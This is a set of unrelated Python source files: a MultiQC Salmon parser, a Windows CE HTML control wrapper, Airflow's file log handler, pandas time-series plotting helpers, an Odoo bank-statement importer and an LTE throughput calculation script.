#!/usr/bin/env python """ MultiQC module to parse output from Salmon """ from __future__ import print_function from collections import OrderedDict import json import logging import os from multiqc.plots import linegraph from multiqc.modules.base_module import BaseMultiqcModule # Initialise the logger log = logging.getLogger(__name__) class MultiqcModule(BaseMultiqcModule): def __init__(self): # Initialise the parent object super(MultiqcModule, self).__init__( name="Salmon", anchor="salmon", href="http://combine-lab.github.io/salmon/", info="is a tool for quantifying the expression of transcripts using RNA-seq data.", ) # Parse meta information. JSON win! self.salmon_meta = dict() for f in self.find_log_files("salmon/meta"): # Get the s_name from the parent directory s_name = os.path.basename(os.path.dirname(f["root"])) s_name = self.clean_s_name(s_name, f) self.salmon_meta[s_name] = json.loads(f["f"]) # Parse Fragment Length Distribution logs self.salmon_fld = dict() for f in self.find_log_files("salmon/fld"): # Get the s_name from the parent directory if os.path.basename(f["root"]) == "libParams": s_name = os.path.basename(os.path.dirname(f["root"])) s_name = self.clean_s_name(s_name, f) parsed = OrderedDict() for i, v in enumerate(f["f"].split()): parsed[i] = float(v) if len(parsed) > 0: if s_name in self.salmon_fld: log.debug("Duplicate sample name found! Overwriting: {}".format(s_name)) self.add_data_source(f, s_name) self.salmon_fld[s_name] = parsed # Filter to strip out ignored sample names self.salmon_meta = self.ignore_samples(self.salmon_meta) self.salmon_fld = self.ignore_samples(self.salmon_fld) if len(self.salmon_meta) == 0 and len(self.salmon_fld) == 0: raise UserWarning if len(self.salmon_meta) > 0: log.info("Found {} meta reports".format(len(self.salmon_meta))) self.write_data_file(self.salmon_meta, "multiqc_salmon") if len(self.salmon_fld) > 0: log.info("Found {} fragment length distributions".format(len(self.salmon_fld))) # Add alignment rate to the general stats table headers = OrderedDict() headers["percent_mapped"] = { "title": "% Aligned", "description": "% Mapped reads", "max": 100, "min": 0, "suffix": "%", "scale": "YlGn", } headers["num_mapped"] = { "title": "M Aligned", "description": "Mapped reads (millions)", "min": 0, "scale": "PuRd", "modify": lambda x: float(x) / 1000000, "shared_key": "read_count", } self.general_stats_addcols(self.salmon_meta, headers) if len(self.salmon_fld) > 0: # Fragment length distribution plot pconfig = { "smooth_points": 500, "id": "salmon_plot", "title": "Salmon: Fragment Length Distribution", "ylab": "Fraction", "xlab": "Fragment Length (bp)", "ymin": 0, "xmin": 0, "tt_label": "<b>{point.x:,.0f} bp</b>: {point.y:,.0f}", } self.add_section(plot=linegraph.plot(self.salmon_fld, pconfig))
## Copyright (c) Alexandre Delattre 2008 ## Permission is hereby granted, free of charge, to any person obtaining ## a copy of this software and associated documentation files (the ## "Software"), to deal in the Software without restriction, including ## without limitation the rights to use, copy, modify, merge, publish, ## distribute, sublicense, and/or sell copies of the Software, and to ## permit persons to whom the Software is furnished to do so, subject to ## the following conditions: ## The above copyright notice and this permission notice shall be ## included in all copies or substantial portions of the Software. ## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, ## EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF ## MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND ## NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE ## LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION ## OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION ## WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE from core import * from ctypes import cdll, Structure, Union DTM_ADDTEXTW = WM_USER+102 DTM_ENDOFSOURCE = WM_USER + 104 DTM_NAVIGATE = WM_USER + 120 DTM_ZOOMLEVEL = WM_USER + 116 DTM_CLEAR = WM_USER + 113 DTM_ENABLESHRINK = WM_USER + 107 DTM_ENABLECONTEXTMENU = WM_USER + 110 class _U_NM_HTMLVIEW(Union): _fields_ = [('dwCookie', DWORD), ('dwFlags', DWORD) ] class NM_HTMLVIEW(Structure): _fields_ = [('hdr', NMHDR), ('szTarget', LPCTSTR), ('szData', LPCTSTR), ('_u', _U_NM_HTMLVIEW), ('szExInfo', LPCTSTR), ] _anonymous_ = ('_u',) NM_BEFORENAVIGATE = WM_USER + 109 class BeforeNavigateEvent(NotificationEvent): def __init__(self, hwnd, nmsg, wparam, lparam): NotificationEvent.__init__(self, hwnd, nmsg, wparam, lparam) nmhtml = NM_HTMLVIEW.from_address(lparam) self._url = nmhtml.szTarget def get_url(self): return self._url class Html(Control): _w32_window_class = "DISPLAYCLASS" _dispatchers = {"navigate" : (NTFEventDispatcher, NM_BEFORENAVIGATE, BeforeNavigateEvent) } _dispatchers.update(Control._dispatchers) def _addtext(self, txt, plain=False): txt=unicode(txt) self._send_w32_msg(DTM_ADDTEXTW, int(plain), txt) def _endofsource(self): self._send_w32_msg(DTM_ENDOFSOURCE) def navigate(self, url): url = unicode(url) self._send_w32_msg(DTM_NAVIGATE, 0, url) def set_zoom_level(self, level): if not level in range(5): raise TypeError, 'level must be in [0,1,2,3,4]' self._send_w32_msg(DTM_ZOOMLEVEL, 0, level) def set_value(self, html): self.clear() self._addtext(html) self._endofsource() def set_text(self, txt): self.clear() self._addtext(txt, True) self._endofsource() def clear(self): self._send_w32_msg(DTM_CLEAR) def enablecontextmenu(self, val=True): self._send_w32_msg(DTM_ENABLECONTEXTMENU, 0, MAKELPARAM(0,int(val))) def enableshrink(self, val=True): self._send_w32_msg(DTM_ENABLESHRINK, 0, MAKELPARAM(0,int(val))) def _InitHTMLControl(): cdll.htmlview.InitHTMLControl(GetModuleHandle(0)) _InitHTMLControl()
# -*- coding: utf-8 -*- # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import logging import os import requests from airflow import configuration as conf from airflow.configuration import AirflowConfigException from airflow.utils.file import mkdirs from airflow.utils.helpers import parse_template_string class FileTaskHandler(logging.Handler): """ FileTaskHandler is a python log handler that handles and reads task instance logs. It creates and delegates log handling to `logging.FileHandler` after receiving task instance context. It reads logs from task instance's host machine. """ def __init__(self, base_log_folder, filename_template): """ :param base_log_folder: Base log folder to place logs. :param filename_template: template filename string """ super(FileTaskHandler, self).__init__() self.handler = None self.local_base = base_log_folder self.filename_template, self.filename_jinja_template = \ parse_template_string(filename_template) def set_context(self, ti): """ Provide task_instance context to airflow task handler. :param ti: task instance object """ local_loc = self._init_file(ti) self.handler = logging.FileHandler(local_loc) self.handler.setFormatter(self.formatter) self.handler.setLevel(self.level) def emit(self, record): if self.handler is not None: self.handler.emit(record) def flush(self): if self.handler is not None: self.handler.flush() def close(self): if self.handler is not None: self.handler.close() def _render_filename(self, ti, try_number): if self.filename_jinja_template: jinja_context = ti.get_template_context() jinja_context['try_number'] = try_number return self.filename_jinja_template.render(**jinja_context) return self.filename_template.format(dag_id=ti.dag_id, task_id=ti.task_id, execution_date=ti.execution_date.isoformat(), try_number=try_number) def _read(self, ti, try_number, metadata=None): """ Template method that contains custom logic of reading logs given the try_number. :param ti: task instance record :param try_number: current try_number to read log from :param metadata: log metadata, can be used for steaming log reading and auto-tailing. :return: log message as a string and metadata. """ # Task instance here might be different from task instance when # initializing the handler. Thus explicitly getting log location # is needed to get correct log path. log_relative_path = self._render_filename(ti, try_number) location = os.path.join(self.local_base, log_relative_path) log = "" if os.path.exists(location): try: with open(location) as f: log += "*** Reading local file: {}\n".format(location) log += "".join(f.readlines()) except Exception as e: log = "*** Failed to load local log file: {}\n".format(location) log += "*** {}\n".format(str(e)) else: url = os.path.join( "http://{ti.hostname}:{worker_log_server_port}/log", log_relative_path ).format( ti=ti, worker_log_server_port=conf.get('celery', 'WORKER_LOG_SERVER_PORT') ) log += "*** Log file does not exist: {}\n".format(location) log += "*** Fetching from: {}\n".format(url) try: timeout = None # No timeout try: timeout = conf.getint('webserver', 'log_fetch_timeout_sec') except (AirflowConfigException, ValueError): pass response = requests.get(url, timeout=timeout) # Check if the resource was properly fetched response.raise_for_status() log += '\n' + response.text except Exception as e: log += "*** Failed to fetch log file from worker. {}\n".format(str(e)) return log, {'end_of_log': True} def read(self, task_instance, try_number=None, metadata=None): """ Read logs of given task instance from local machine. :param task_instance: task instance object :param try_number: task instance try_number to read logs from. If None it returns all logs separated by try_number :param metadata: log metadata, can be used for steaming log reading and auto-tailing. :return: a list of logs """ # Task instance increments its try number when it starts to run. # So the log for a particular task try will only show up when # try number gets incremented in DB, i.e logs produced the time # after cli run and before try_number + 1 in DB will not be displayed. if try_number is None: next_try = task_instance.next_try_number try_numbers = list(range(1, next_try)) elif try_number < 1: logs = [ 'Error fetching the logs. Try number {} is invalid.'.format(try_number), ] return logs else: try_numbers = [try_number] logs = [''] * len(try_numbers) metadatas = [{}] * len(try_numbers) for i, try_number in enumerate(try_numbers): log, metadata = self._read(task_instance, try_number, metadata) logs[i] += log metadatas[i] = metadata return logs, metadatas def _init_file(self, ti): """ Create log directory and give it correct permissions. :param ti: task instance object :return relative log path of the given task instance """ # To handle log writing when tasks are impersonated, the log files need to # be writable by the user that runs the Airflow command and the user # that is impersonated. This is mainly to handle corner cases with the # SubDagOperator. When the SubDagOperator is run, all of the operators # run under the impersonated user and create appropriate log files # as the impersonated user. However, if the user manually runs tasks # of the SubDagOperator through the UI, then the log files are created # by the user that runs the Airflow command. For example, the Airflow # run command may be run by the `airflow_sudoable` user, but the Airflow # tasks may be run by the `airflow` user. If the log files are not # writable by both users, then it's possible that re-running a task # via the UI (or vice versa) results in a permission error as the task # tries to write to a log file created by the other user. relative_path = self._render_filename(ti, ti.try_number) full_path = os.path.join(self.local_base, relative_path) directory = os.path.dirname(full_path) # Create the log file and give it group writable permissions # TODO(aoen): Make log dirs and logs globally readable for now since the SubDag # operator is not compatible with impersonation (e.g. if a Celery executor is used # for a SubDag operator and the SubDag operator has a different owner than the # parent DAG) if not os.path.exists(directory): # Create the directory as globally writable using custom mkdirs # as os.makedirs doesn't set mode properly. mkdirs(directory, 0o777) if not os.path.exists(full_path): open(full_path, "a").close() # TODO: Investigate using 444 instead of 666. os.chmod(full_path, 0o666) return full_path
""" Period formatters and locators adapted from scikits.timeseries by Pierre GF Gerard-Marchant & Matt Knox """ #!!! TODO: Use the fact that axis can have units to simplify the process from matplotlib import pylab import numpy as np from pandas import isnull from pandas.tseries.period import Period from pandas.tseries.offsets import DateOffset import pandas.tseries.frequencies as frequencies from pandas.tseries.index import DatetimeIndex import pandas.core.common as com from pandas.tseries.converter import (PeriodConverter, TimeSeries_DateLocator, TimeSeries_DateFormatter) #---------------------------------------------------------------------- # Plotting functions and monkey patches def tsplot(series, plotf, **kwargs): """ Plots a Series on the given Matplotlib axes or the current axes Parameters ---------- axes : Axes series : Series Notes _____ Supports same kwargs as Axes.plot """ # Used inferred freq is possible, need a test case for inferred if 'ax' in kwargs: ax = kwargs.pop('ax') else: import matplotlib.pyplot as plt ax = plt.gca() freq = _get_freq(ax, series) # resample against axes freq if necessary if freq is None: # pragma: no cover raise ValueError('Cannot use dynamic axis without frequency info') else: # Convert DatetimeIndex to PeriodIndex if isinstance(series.index, DatetimeIndex): series = series.to_period(freq=freq) freq, ax_freq, series = _maybe_resample(series, ax, freq, plotf, kwargs) # Set ax with freq info _decorate_axes(ax, freq, kwargs) # how to make sure ax.clear() flows through? if not hasattr(ax, '_plot_data'): ax._plot_data = [] ax._plot_data.append((series, plotf, kwargs)) lines = plotf(ax, series.index._mpl_repr(), series.values, **kwargs) # set date formatter, locators and rescale limits format_dateaxis(ax, ax.freq) # x and y coord info ax.format_coord = lambda t, y: ("t = {0} " "y = {1:8f}".format(Period(ordinal=int(t), freq=ax.freq), y)) return lines def _maybe_resample(series, ax, freq, plotf, kwargs): ax_freq = _get_ax_freq(ax) if ax_freq is not None and freq != ax_freq: if frequencies.is_superperiod(freq, ax_freq): # upsample input series = series.copy() series.index = series.index.asfreq(ax_freq, how='s') freq = ax_freq elif _is_sup(freq, ax_freq): # one is weekly how = kwargs.pop('how', 'last') series = series.resample('D', how=how).dropna() series = series.resample(ax_freq, how=how).dropna() freq = ax_freq elif frequencies.is_subperiod(freq, ax_freq) or _is_sub(freq, ax_freq): _upsample_others(ax, freq, plotf, kwargs) ax_freq = freq else: # pragma: no cover raise ValueError('Incompatible frequency conversion') return freq, ax_freq, series def _get_ax_freq(ax): ax_freq = getattr(ax, 'freq', None) if ax_freq is None: if hasattr(ax, 'left_ax'): ax_freq = getattr(ax.left_ax, 'freq', None) elif hasattr(ax, 'right_ax'): ax_freq = getattr(ax.right_ax, 'freq', None) return ax_freq def _is_sub(f1, f2): return ((f1.startswith('W') and frequencies.is_subperiod('D', f2)) or (f2.startswith('W') and frequencies.is_subperiod(f1, 'D'))) def _is_sup(f1, f2): return ((f1.startswith('W') and frequencies.is_superperiod('D', f2)) or (f2.startswith('W') and frequencies.is_superperiod(f1, 'D'))) def _upsample_others(ax, freq, plotf, kwargs): legend = ax.get_legend() lines, labels = _replot_ax(ax, freq, kwargs) other_ax = None if hasattr(ax, 'left_ax'): other_ax = ax.left_ax if hasattr(ax, 'right_ax'): other_ax = ax.right_ax if other_ax is not None: rlines, rlabels = _replot_ax(other_ax, freq, kwargs) lines.extend(rlines) labels.extend(rlabels) if (legend is not None and kwargs.get('legend', True) and len(lines) > 0): title = legend.get_title().get_text() if title == 'None': title = None ax.legend(lines, labels, loc='best', title=title) def _replot_ax(ax, freq, kwargs): data = getattr(ax, '_plot_data', None) ax._plot_data = [] ax.clear() _decorate_axes(ax, freq, kwargs) lines = [] labels = [] if data is not None: for series, plotf, kwds in data: series = series.copy() idx = series.index.asfreq(freq, how='S') series.index = idx ax._plot_data.append(series) lines.append(plotf(ax, series.index._mpl_repr(), series.values, **kwds)[0]) labels.append(com.pprint_thing(series.name)) return lines, labels def _decorate_axes(ax, freq, kwargs): ax.freq = freq xaxis = ax.get_xaxis() xaxis.freq = freq if not hasattr(ax, 'legendlabels'): ax.legendlabels = [kwargs.get('label', None)] else: ax.legendlabels.append(kwargs.get('label', None)) ax.view_interval = None ax.date_axis_info = None def _get_freq(ax, series): # get frequency from data freq = getattr(series.index, 'freq', None) if freq is None: freq = getattr(series.index, 'inferred_freq', None) ax_freq = getattr(ax, 'freq', None) # use axes freq if no data freq if freq is None: freq = ax_freq # get the period frequency if isinstance(freq, DateOffset): freq = freq.rule_code else: freq = frequencies.get_base_alias(freq) freq = frequencies.get_period_alias(freq) return freq # Patch methods for subplot. Only format_dateaxis is currently used. # Do we need the rest for convenience? def format_dateaxis(subplot, freq): """ Pretty-formats the date axis (x-axis). Major and minor ticks are automatically set for the frequency of the current underlying series. As the dynamic mode is activated by default, changing the limits of the x axis will intelligently change the positions of the ticks. """ majlocator = TimeSeries_DateLocator(freq, dynamic_mode=True, minor_locator=False, plot_obj=subplot) minlocator = TimeSeries_DateLocator(freq, dynamic_mode=True, minor_locator=True, plot_obj=subplot) subplot.xaxis.set_major_locator(majlocator) subplot.xaxis.set_minor_locator(minlocator) majformatter = TimeSeries_DateFormatter(freq, dynamic_mode=True, minor_locator=False, plot_obj=subplot) minformatter = TimeSeries_DateFormatter(freq, dynamic_mode=True, minor_locator=True, plot_obj=subplot) subplot.xaxis.set_major_formatter(majformatter) subplot.xaxis.set_minor_formatter(minformatter) pylab.draw_if_interactive()
# -*- coding: utf-8 -*- """Framework for importing bank statement files.""" import logging import base64 from openerp import api, models, fields from openerp.tools.translate import _ from openerp.exceptions import Warning _logger = logging.getLogger(__name__) class AccountBankStatementLine(models.Model): """Extend model account.bank.statement.line.""" _inherit = "account.bank.statement.line" # Ensure transactions can be imported only once (if the import format # provides unique transaction ids) unique_import_id = fields.Char('Import ID', readonly=True, copy=False) _sql_constraints = [ ('unique_import_id', 'unique (unique_import_id)', 'A bank account transactions can be imported only once !') ] class AccountBankStatementImport(models.TransientModel): """Extend model account.bank.statement.""" _name = 'account.bank.statement.import' _description = 'Import Bank Statement' @api.model def _get_hide_journal_field(self): """ Return False if the journal_id can't be provided by the parsed file and must be provided by the wizard. See account_bank_statement_import_qif """ return True journal_id = fields.Many2one( 'account.journal', string='Journal', help='Accounting journal related to the bank statement you\'re ' 'importing. It has be be manually chosen for statement formats which ' 'doesn\'t allow automatic journal detection (QIF for example).') hide_journal_field = fields.Boolean( string='Hide the journal field in the view', compute='_get_hide_journal_field') data_file = fields.Binary( 'Bank Statement File', required=True, help='Get you bank statements in electronic format from your bank ' 'and select them here.') @api.multi def import_file(self): """ Process the file chosen in the wizard, create bank statement(s) and go to reconciliation.""" self.ensure_one() data_file = base64.b64decode(self.data_file) statement_ids, notifications = self.with_context( active_id=self.id)._import_file(data_file) # dispatch to reconciliation interface action = self.env.ref( 'account.action_bank_reconcile_bank_statements') return { 'name': action.name, 'tag': action.tag, 'context': { 'statement_ids': statement_ids, 'notifications': notifications }, 'type': 'ir.actions.client', } @api.model def _import_file(self, data_file): """ Create bank statement(s) from file.""" # The appropriate implementation module returns the required data statement_ids = [] notifications = [] parse_result = self._parse_file(data_file) # Check for old version result, with separate currency and account if isinstance(parse_result, tuple) and len(parse_result) == 3: (currency_code, account_number, statements) = parse_result for stmt_vals in statements: stmt_vals['currency_code'] = currency_code stmt_vals['account_number'] = account_number else: statements = parse_result # Check raw data: self._check_parsed_data(statements) # Import all statements: for stmt_vals in statements: (statement_id, new_notifications) = ( self._import_statement(stmt_vals)) if statement_id: statement_ids.append(statement_id) notifications.append(new_notifications) if len(statement_ids) == 0: raise Warning(_('You have already imported that file.')) return statement_ids, notifications @api.model def _import_statement(self, stmt_vals): """Import a single bank-statement. Return ids of created statements and notifications. """ currency_code = stmt_vals.pop('currency_code') account_number = stmt_vals.pop('account_number') # Try to find the bank account and currency in odoo currency_id = self._find_currency_id(currency_code) bank_account_id = self._find_bank_account_id(account_number) if not bank_account_id and account_number: raise Warning(_('Can not find the account number %s.') % account_number) # Find the bank journal journal_id = self._get_journal(currency_id, bank_account_id) # By now journal and account_number must be known if not journal_id: raise Warning(_('Can not determine journal for import.')) # Prepare statement data to be used for bank statements creation stmt_vals = self._complete_statement( stmt_vals, journal_id, account_number) # Create the bank stmt_vals return self._create_bank_statement(stmt_vals) @api.model def _parse_file(self, data_file): """ Each module adding a file support must extends this method. It processes the file if it can, returns super otherwise, resulting in a chain of responsability. This method parses the given file and returns the data required by the bank statement import process, as specified below. - bank statements data: list of dict containing (optional items marked by o) : -o currency code: string (e.g: 'EUR') The ISO 4217 currency code, case insensitive -o account number: string (e.g: 'BE1234567890') The number of the bank account which the statement belongs to - 'name': string (e.g: '000000123') - 'date': date (e.g: 2013-06-26) -o 'balance_start': float (e.g: 8368.56) -o 'balance_end_real': float (e.g: 8888.88) - 'transactions': list of dict containing : - 'name': string (e.g: 'KBC-INVESTERINGSKREDIET 787-5562831-01') - 'date': date - 'amount': float - 'unique_import_id': string -o 'account_number': string Will be used to find/create the res.partner.bank in odoo -o 'note': string -o 'partner_name': string -o 'ref': string """ raise Warning(_( 'Could not make sense of the given file.\n' 'Did you install the module to support this type of file?' )) @api.model def _check_parsed_data(self, statements): """ Basic and structural verifications """ if len(statements) == 0: raise Warning(_('This file doesn\'t contain any statement.')) for stmt_vals in statements: if 'transactions' in stmt_vals and stmt_vals['transactions']: return # If we get here, no transaction was found: raise Warning(_('This file doesn\'t contain any transaction.')) @api.model def _find_currency_id(self, currency_code): """ Get res.currency ID.""" if currency_code: currency_ids = self.env['res.currency'].search( [('name', '=ilike', currency_code)]) if currency_ids: return currency_ids[0].id else: raise Warning(_( 'Statement has invalid currency code %s') % currency_code) # if no currency_code is provided, we'll use the company currency return self.env.user.company_id.currency_id.id @api.model def _find_bank_account_id(self, account_number): """ Get res.partner.bank ID """ bank_account_id = None if account_number and len(account_number) > 4: bank_account_ids = self.env['res.partner.bank'].search( [('acc_number', '=', account_number)], limit=1) if bank_account_ids: bank_account_id = bank_account_ids[0].id return bank_account_id @api.model def _get_journal(self, currency_id, bank_account_id): """ Find the journal """ bank_model = self.env['res.partner.bank'] # Find the journal from context, wizard or bank account journal_id = self.env.context.get('journal_id') or self.journal_id.id if bank_account_id: bank_account = bank_model.browse(bank_account_id) if journal_id: if (bank_account.journal_id.id and bank_account.journal_id.id != journal_id): raise Warning( _('The account of this statement is linked to ' 'another journal.')) if not bank_account.journal_id.id: bank_model.write({'journal_id': journal_id}) else: if bank_account.journal_id.id: journal_id = bank_account.journal_id.id # If importing into an existing journal, its currency must be the same # as the bank statement. When journal has no currency, currency must # be equal to company currency. if journal_id and currency_id: journal_obj = self.env['account.journal'].browse(journal_id) if journal_obj.currency: journal_currency_id = journal_obj.currency.id if currency_id != journal_currency_id: # ALso log message with id's for technical analysis: _logger.warn( _('Statement currency id is %d,' ' but journal currency id = %d.'), currency_id, journal_currency_id ) raise Warning(_( 'The currency of the bank statement is not ' 'the same as the currency of the journal !' )) else: company_currency_id = self.env.user.company_id.currency_id.id if currency_id != company_currency_id: # ALso log message with id's for technical analysis: _logger.warn( _('Statement currency id is %d,' ' but company currency id = %d.'), currency_id, company_currency_id ) raise Warning(_( 'The currency of the bank statement is not ' 'the same as the company currency !' )) return journal_id @api.model @api.returns('res.partner.bank') def _create_bank_account( self, account_number, company_id=False, currency_id=False): """Automagically create bank account, when not yet existing.""" try: bank_type = self.env.ref('base.bank_normal') bank_code = bank_type.code except ValueError: bank_code = 'bank' vals_acc = { 'acc_number': account_number, 'state': bank_code, } # Odoo users bank accounts (which we import statement from) have # company_id and journal_id set while 'counterpart' bank accounts # (from which statement transactions originate) don't. # Warning : if company_id is set, the method post_write of class # bank will create a journal if company_id: vals = self.env['res.partner.bank'].onchange_company_id(company_id) vals_acc.update(vals.get('value', {})) vals_acc['company_id'] = company_id # When the journal is created at same time of the bank account, we need # to specify the currency to use for the account.account and # account.journal return self.env['res.partner.bank'].with_context( default_currency_id=currency_id, default_currency=currency_id).create(vals_acc) @api.model def _complete_statement(self, stmt_vals, journal_id, account_number): """Complete statement from information passed.""" stmt_vals['journal_id'] = journal_id for line_vals in stmt_vals['transactions']: unique_import_id = line_vals.get('unique_import_id', False) if unique_import_id: line_vals['unique_import_id'] = ( (account_number and account_number + '-' or '') + unique_import_id ) if not line_vals.get('bank_account_id'): # Find the partner and his bank account or create the bank # account. The partner selected during the reconciliation # process will be linked to the bank when the statement is # closed. partner_id = False bank_account_id = False account_number = line_vals.get('account_number') if account_number: bank_model = self.env['res.partner.bank'] banks = bank_model.search( [('acc_number', '=', account_number)], limit=1) if banks: bank_account_id = banks[0].id partner_id = banks[0].partner_id.id else: bank_obj = self._create_bank_account(account_number) bank_account_id = bank_obj and bank_obj.id or False line_vals['partner_id'] = partner_id line_vals['bank_account_id'] = bank_account_id return stmt_vals @api.model def _create_bank_statement(self, stmt_vals): """ Create bank statement from imported values, filtering out already imported transactions, and return data used by the reconciliation widget """ bs_model = self.env['account.bank.statement'] bsl_model = self.env['account.bank.statement.line'] # Filter out already imported transactions and create statement ignored_line_ids = [] filtered_st_lines = [] for line_vals in stmt_vals['transactions']: unique_id = ( 'unique_import_id' in line_vals and line_vals['unique_import_id'] ) if not unique_id or not bool(bsl_model.sudo().search( [('unique_import_id', '=', unique_id)], limit=1)): filtered_st_lines.append(line_vals) else: ignored_line_ids.append(unique_id) statement_id = False if len(filtered_st_lines) > 0: # Remove values that won't be used to create records stmt_vals.pop('transactions', None) for line_vals in filtered_st_lines: line_vals.pop('account_number', None) # Create the statement stmt_vals['line_ids'] = [ [0, False, line] for line in filtered_st_lines] statement_id = bs_model.create(stmt_vals).id # Prepare import feedback notifications = [] num_ignored = len(ignored_line_ids) if num_ignored > 0: notifications += [{ 'type': 'warning', 'message': _("%d transactions had already been imported and " "were ignored.") % num_ignored if num_ignored > 1 else _("1 transaction had already been imported and " "was ignored."), 'details': { 'name': _('Already imported items'), 'model': 'account.bank.statement.line', 'ids': bsl_model.search( [('unique_import_id', 'in', ignored_line_ids)]).ids} }] return statement_id, notifications
#!/usr/bin/env python # get throughput # author: Ivan Senin import os import sys import re import numpy as np ignore_imsi_str = "--ignore-imsi" def toThroughputKbps(bytes, seconds): return bytes / 1000.0 * 8 / seconds #------------------------------------------------------------------------------- # RLC #------------------------------------------------------------------------------- def processRlcStats(filename, start_time, ignor_ui_id = False): epochDuration = .200 dlRlcKPIs = np.loadtxt(filename, comments = '%') # rows: 0start 1end 2CellId 3IMSI 4RNTI 5LCID 6nTxPDUs 7TxBytes 8nRxPDUs 9RxBytes delay stdDev min max PduSize stdDev min max totalBytesRx = [.0, .0, .0] totalBytesRxPrev = [.0, .0, .0] maxThroughput = [.0, .0, .0] rlcStartTime = dlRlcKPIs[0 , 0] epochStartTime = [rlcStartTime, rlcStartTime, rlcStartTime] totalDuration = dlRlcKPIs[-1, 1] - dlRlcKPIs[0 , 0] for i in range(dlRlcKPIs.shape[0]): time = dlRlcKPIs[i, 0] if time < start_time: continue ueId = 0 if ignor_ui_id else np.uint32(dlRlcKPIs[i, 3]) - 1 rxBytes = dlRlcKPIs[i, 9] totalBytesRx[ueId] += rxBytes if time >= epochStartTime[ueId] + epochDuration: curThroughput = toThroughputKbps(totalBytesRx[ueId] - totalBytesRxPrev[ueId], time - epochStartTime[ueId]) maxThroughput[ueId] = max(curThroughput, maxThroughput[ueId]) epochStartTime[ueId] = time totalBytesRxPrev[ueId] = totalBytesRx[ueId] print "DlThroughput (RLC) [Kbps]:" print "Ue Id Max (per {0:3} sec) Average".format(epochDuration) number_ues = 1 if ignor_ui_id else 3 throughput1 = 0.0 maxThroughput2 = 0.0 for i in range(number_ues): aveThroughput = toThroughputKbps(totalBytesRx[i], totalDuration) if ignor_ui_id: throughput1 = aveThroughput maxThroughput2 = maxThroughput[i] print "{0:<8}{1:<20}{2:<16}".format(i + 1, maxThroughput[i], aveThroughput) print "" return throughput1, maxThroughput2 #------------------------------------------------------------------------------- # MAC #------------------------------------------------------------------------------- def processMacStats(filename, start_time, ignor_ui_id = False): epochDuration = .400 dlMacKPIs = np.loadtxt(filename, comments = '%') # rows: 0time 1cellId 2IMSI 3frame 4sframe 5RNTI 6mcsTb1 7sizeTb1 mcsTb2 sizeTb2 macStartTime = dlMacKPIs[0, 0] totalBytesRx = [.0, .0, .0] totalBytesRxPrev = [.0, .0, .0] maxThroughput = [.0, .0, .0] epochStartTime = [macStartTime, macStartTime, macStartTime] mcss = [0, 0, 0] mcss_num = [0, 0, 0] for i in range(dlMacKPIs.shape[0]): time = dlMacKPIs[i, 0] if time < start_time: continue ueId = 0 if ignor_ui_id else np.uint32(dlMacKPIs[i, 2]) - 1 mcs = np.uint32(dlMacKPIs[i, 6]) if mcs == 0: continue mcss[ueId] += mcs mcss_num[ueId] += 1 totalBytesRx[ueId] += dlMacKPIs[i, 7] if time >= epochStartTime[ueId] + epochDuration: curThroughput = toThroughputKbps(totalBytesRx[ueId] - totalBytesRxPrev[ueId], time - epochStartTime[ueId]) maxThroughput[ueId] = curThroughput if curThroughput > maxThroughput[ueId] else maxThroughput[ueId] epochStartTime[ueId] = time totalBytesRxPrev[ueId] = totalBytesRx[ueId] totalDuration = dlMacKPIs[-1, 0] - macStartTime print "DlThroughput (MAC) [Kbps]: Received (MAC):" print "Ue Id Max Average [Mb]" number_ues = 1 if ignor_ui_id else 3 for i in range(number_ues): aveThroughput = round(toThroughputKbps(totalBytesRx[i], totalDuration), 3) dataTxRx = round(totalBytesRx[i] / 1024. / 1024. , 3) print "{0:<8}{1:<12}{2:<20}{3:<12}{4:<4}".format(i + 1, \ round(maxThroughput[i], 3), \ aveThroughput, \ dataTxRx, \ round(float(mcss[i])/ mcss_num[i], 2)) print "" def is_float(value): try: float(value) return True except ValueError: return False def usage(): print "File name must contain words mac or rlc to process them appropriate\n" print "Usage: throughputCalc.py filepath [start time in same resolution as in file] [", ignore_imsi_str, "]\n" print ignore_imsi_str, ":\tSum statistics" print "Examples:" print "throughputCalc.py DlRlcStats.txt" print "throughputCalc.py ./some_directory/DlMacStats.txt 0.11 ", ignore_imsi_str ,"\n" def main(): argc = len(sys.argv) if argc < 2: usage() return full_path = sys.argv[1] filename = os.path.basename(full_path) is_mac_stats = re.search("mac", filename, re.IGNORECASE) is_rlc_stats = re.search("rlc", filename, re.IGNORECASE) if len(filename) == 0 or (is_mac_stats and is_rlc_stats) or (not is_mac_stats and not is_rlc_stats): usage() return; start_time = float(sys.argv[2]) if argc > 2 and is_float(sys.argv[2]) else float("-NaN") ave_thr = 0.0 max_thr = 0.0 if is_mac_stats: processMacStats(full_path, start_time, ignore_imsi_str in sys.argv) else: ave_thr, max_thr = processRlcStats(full_path, start_time, ignore_imsi_str in sys.argv) if (ave_thr > 0.1): helper_log = open("compAlgo/output/log.log") aveTimeBwSwitches = round(float(helper_log.readline()), 2) switches_count = int(helper_log.readline()) print round(ave_thr, 2), "\t", round(max_thr,2), "\t", switches_count, "\t", aveTimeBwSwitches helper_log.close() main()
